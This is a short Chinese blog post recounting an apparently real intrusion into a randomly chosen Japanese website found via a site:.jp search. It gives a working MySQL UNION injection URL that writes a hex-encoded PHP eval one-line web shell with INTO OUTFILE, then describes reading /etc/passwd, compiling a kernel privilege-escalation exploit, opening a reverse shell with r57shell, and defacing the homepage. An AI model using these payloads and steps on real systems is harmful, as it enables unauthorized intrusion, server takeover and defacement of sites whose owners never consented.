Mysql注入拿shell一例

晚上无聊,google:site:.jp,随便找了个目标试试,发现有注入,如下图:

直接丢穿山甲里注吧:

看着是root,可以读“/etc/passwd”,找apache的配置文件读下看看吧,找到了http.conf文件“/etc/httpd/conf/httpd.conf”,然后找到了网站路径:

用穿山甲的写文件功能无法导出shell,让我一阵蛋疼,只能手工试试了,使用下面的命令导出:

http://localhost/news/detail.php?news_seq=7069%20and%201=2%20union%20select%200,0x3C3F70687020406576616C28245F504F53545B276273275D293B3F3E,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE ‘/tmp/t.txt’%20–

然后读了下“/tmp/t.txt”,有内容,之后将路径修改成网站路径“/var/www/html/”,发现无法导出,让我一阵郁闷,之后想到了导出到子目录“/var/www/html/news/”,成功导出一句话,菜刀连接之,然后想改个主页,发现没权限,www根目录下没任何权限,之后子目录中可以修改,这有鸟用么….

之后使用uname -a查看下内核版本提权用:

将文件改名成c然后执行下面的命令:

cp /var/www/html/news/2.6.18.txt /tmp/test.c
cd /tmp
gcc test.c -o test
chmod +x test
./test

2.6.18.txt

不过在菜刀下无法溢出,只能反弹了,找了个r57shell自带反弹功能,反弹个shell之后改下网站目录权限改主页之:

转载请注明: 本文《Mysql注入拿shell一例》来源于bstaint的博客

没有评论: